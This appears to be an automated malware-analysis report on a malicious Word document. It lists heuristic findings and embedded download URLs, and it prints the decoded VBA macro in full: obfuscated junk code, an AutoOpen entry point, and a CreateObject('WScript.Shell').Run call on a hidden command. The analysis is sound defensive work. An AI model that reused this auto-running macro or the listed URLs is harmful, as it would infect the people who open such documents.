Verdict: MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1203 Exploitation for Client Execution
The sample contains VBA macros with an AutoOpen function, a common technique for malicious Office documents. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macro attempts to execute external commands. The script concatenates strings to form 'WscRipt.sHeLl', which is then likely used to download and execute a payload from one of the embedded URLs.
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6817914-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Generic-6817914-0
- VBA macros detected [medium] OLE_VBA_MACROS (4 related findings): Document contains VBA macro code
- WScript.Shell usage [critical] OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
  `End Select Handmade89 = "" + teal11 + UzbekistanSum71 + "WscRipt.sHeLl" + microchip35 + turquoise33 + toolset14 Select Case azure39`
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
  `End Select Optional88 = Array(synergize98, Rubber47, Lodge84, CreateObject("" + Reengineered28 + ToysToys73 + BabyIndustrial54 + Functionbased44 + usercentric46 + Handmade89).Run!("" + Causeway59 + RAM2 + executive71.TextBox1 + feed16 + webreadiness58, IUkiv), Communications48, Missouri54, bottomline84) Select Case Frozen26`
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
  `Attribute VB_Name = "CheckingAccount84" Sub autoopen() customerloyalty3 = pixel83`
- Reference to Windows Script Host [high] SC_STR_WSCRIPT: Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL `http://binsuloomgroup.com/wp-content/uploads/NefRZe_crlN072r_S@http://jcpers` (in document text, OLE body)
  - URL `http://medicspoint.pk/5RKX6Ot_r3wyO@http://lailarahman.com/NLwq7z5_VIN4p7AR_00KDII@http://aryahospitalksh.com/h1rAZ_HEFn0J_E` (in document text, OLE body)
  - URL `http://schemas.openxmlformats.org/drawingml/2006/main` (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5850 bytes |

SHA-256: 4062dde47334f0dc16be5d587d8b0d31c51d364fbced89665b61f201709dbf60
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "executive71"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "optical97"
Function quantify62()
On Error Resume Next
Select Case visualize71
Case 980
InvestmentAccount61 = CLng(679)
etailers20 = initiatives48
Persistent12 = CDate(yellow90)
Vista95 = firmware20
Metrics54 = Int(240)
Case 468
deliverables8 = Borders86
yellow13 = Cos(bypassing98)
Bedfordshire22 = Facilitator6
Intelligent97 = ChrB(732)
efficient13 = Technician83
End Select
Select Case Lead93
Case 502
Program35 = CLng(826)
HandmadeWoodenBacon3 = intranet9
model85 = CDate(Dynamic16)
Iowa55 = auxiliary73
recontextualize39 = Int(617)
Case 502
Granite43 = Port66
CheckingAccount45 = Cos(Borders70)
SavingsAccount88 = Plastic81
frontend71 = ChrB(744)
payment54 = HTTP15
End Select
Select Case Brand60
Case 828
LicensedGraniteHat3 = CLng(745)
Groves84 = digital17
grey81 = CDate(Vanuatu23)
program49 = Orchestrator14
models33 = Int(712)
Case 297
transmitting75 = ErgonomicFrozenChips80
firmware86 = Cos(IncredibleWoodenBall36)
plum42 = directional76
Chad15 = ChrB(146)
PracticalMetalPizza64 = index50
End Select
Handmade89 = "" + teal11 + UzbekistanSum71 + "WscRipt.sHeLl" + microchip35 + turquoise33 + toolset14
Select Case azure39
Case 489
LibyanDinar82 = CLng(729)
engineer64 = Cambridgeshire19
SmallSteelFish22 = CDate(USB12)
implementation93 = Tunnel24
Generic78 = Int(17)
Case 75
Manager43 = Officer98
deliver76 = Cos(methodology51)
Inverse89 = Forge29
B2B96 = ChrB(466)
GamesComputersSports50 = methodologies36
End Select
Select Case Villages27
Case 245
Representative12 = CLng(839)
BruneiDarussalam86 = connecting15
USB22 = CDate(InvestmentAccount28)
navigating5 = CreditCardAccount16
FrenchSouthernTerritories33 = Int(424)
Case 521
robust65 = Kina97
MoneyMarketAccount17 = Cos(strategic22)
PracticalWoodenPants76 = Buckinghamshire57
Sharable15 = ChrB(718)
FTP18 = BabyMusicIndustrial64
End Select
IUkiv = 0
Select Case pricingstructure62
Case 589
copying15 = CLng(794)
NewZealandDollar2 = compelling79
monetize44 = CDate(Bedfordshire98)
CSS33 = HomeClothing98
payment69 = Int(930)
Case 110
Centralized58 = generate35
TastyWoodenChips2 = Cos(redefine35)
calculate48 = FantasticFrozenCar33
SmallPlasticBike52 = ChrB(129)
capacity4 = HomeLoanAccount9
End Select
Select Case LicensedSoftTable87
Case 796
Bolivia85 = CLng(372)
synthesize72 = Plain57
Grove8 = CDate(Dynamic54)
Utah69 = generate8
SerbianDinar72 = Int(770)
Case 45
supplychains54 = Devolved90
Rubber94 = Cos(withdrawal88)
MoneyMarketAccount18 = USB30
Human14 = ChrB(669)
Upgradable26 = global55
End Select
Select Case needsbased36
Case 247
Berkshire34 = CLng(797)
Key53 = Utah52
turquoise18 = CDate(webenabled7)
Bedfordshire4 = killer42
robust22 = Int(607)
Case 451
Falls88 = USB96
Corners69 = Cos(bypassing45)
bypass36 = Iowa90
orchestration47 = ChrB(276)
Handmade32 = calculate45
End Select
Optional88 = Array(synergize98, Rubber47, Lodge84, CreateObject("" + Reengineered28 + ToysToys73 + BabyIndustrial54 + Functionbased44 + usercentric46 + Handmade89).Run!("" + Causeway59 + RAM2 + executive71.TextBox1 + feed16 + webreadiness58, IUkiv), Communications48, Missouri54, bottomline84)
Select Case Frozen26
Case 424
quantifying22 = CLng(765)
scale18 = Identity93
Plastic13 = CDate(Angola17)
SCSI76 = IntelligentSoftSoap70
generate93 = Int(887)
Case 249
SleekMetalCar61 = Userfriendly80
Technician13 = Cos(Motorway61)
Intranet52 = copy36
Lodge32 = ChrB(685)
black63 = Selfenabling13
End Select
Select Case HTTP71
Case 153
salmon60 = CLng(253)
salmon67 = violet33
olive67 = CDate(cyan45)
Product29 = Inlet21
maximize86 = Int(126)
Case 908
pixel47 = International74
zerotolerance95 = Cos(ErgonomicFreshCar41)
SDD92 = ToolsHealthMusic39
Accounts72 = ChrB(831)
SavingsAccount28 = methodical77
End Select
Select Case migration90
Case 157
regional37 = CLng(415)
Landing23 = port22
Customer92 = CDate(productize79)
Organized54 = matrices57
ToolsIndustrial64 = Int(806)
Case 212
Functionality93 = Rapid12
Underpass58 = Cos(Focused18)
Gorgeous79 = grow4
TastyFrozenSausages98 = ChrB(158)
maroon83 = neural52
End Select
End Function
Attribute VB_Name = "CheckingAccount84"
Sub autoopen()
customerloyalty3 = pixel83
quantify37 = Array(GenericRubberPizza21, Borders75, LicensedConcreteHat87, quantify62, Handmade68, Rubber86, Metal48)
supplychains83 = channels32
End Sub
Function payment91()
index64 = Well45
End Function
```